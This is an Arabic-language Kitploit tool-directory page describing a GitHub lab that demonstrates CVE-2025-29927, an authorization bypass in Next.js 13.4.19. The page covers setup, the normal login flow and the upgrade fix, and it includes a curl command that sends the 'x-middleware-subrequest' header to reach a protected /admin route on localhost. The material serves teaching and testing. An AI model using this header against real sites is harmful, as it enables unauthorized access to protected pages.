Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
NextJS_CVE-2025-29927 — يوضح تجاوز رأس الطلب x-middleware-subrequest في Next.js 13.4.19، مما يسمح بالوصول غير المصرح به إلى المسارات المحمية. يتضمن الإعداد، التدفق الطبيعي، وخطوات الاستغلال باستخدام curl. | Kitploit
أدوات/GitHubGitHub/all3njk/nextjs_cve-2025-29927
تحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHuball3njk/nextjs_cve-2025-29927

NextJS_CVE-2025-29927

يوضح تجاوز رأس الطلب x-middleware-subrequest في Next.js 13.4.19، مما يسمح بالوصول غير المصرح به إلى المسارات المحمية. يتضمن الإعداد، التدفق الطبيعي، وخطوات الاستغلال باستخدام curl.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

عرض تقديمي لتجاوز التفويض في Next.js

يُظهر هذا التطبيق ثغرة x-middleware-subrequest في Next.js 13.4.19، والتي تسمح بتجاوز حماية middleware.

الإعداد

  1. تثبيت التبعيات:
root@kitploit:~
npm install
  1. تشغيل خادم التطوير:
root@kitploit:~
npm run dev

توضيح الثغرة

يحتوي التطبيق على صفحة إدارة في /admin يجب أن تكون محمية بواسطة middleware. ومع ذلك، يمكن الوصول إليها دون مصادقة باستخدام رأس x-middleware-subrequest.

التدفق العادي

  1. زيارة /admin - سيتم إعادة توجيهك إلى /login
  2. تسجيل الدخول بأي بيانات اعتماد - سيتم إعادة توجيهك إلى /admin

طريقة التجاوز

لتجاوز المصادقة، يمكنك استخدام curl أو أي عميل HTTP لإرسال طلب مع رأس x-middleware-subrequest:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin

الآثار الأمنية

توضح هذه الثغرة كيفية تجاوز حماية middleware في Next.js 13.4.19 باستخدام رأس x-middleware-subrequest. في بيئة الإنتاج، قد يسمح ذلك بالوصول غير المصرح به إلى المسارات المحمية.

الإصلاح

لإصلاح هذه الثغرة، قم بالترقية إلى إصدار أحدث من Next.js حيث تم تصحيح هذه المشكلة.

تنزيل الأداة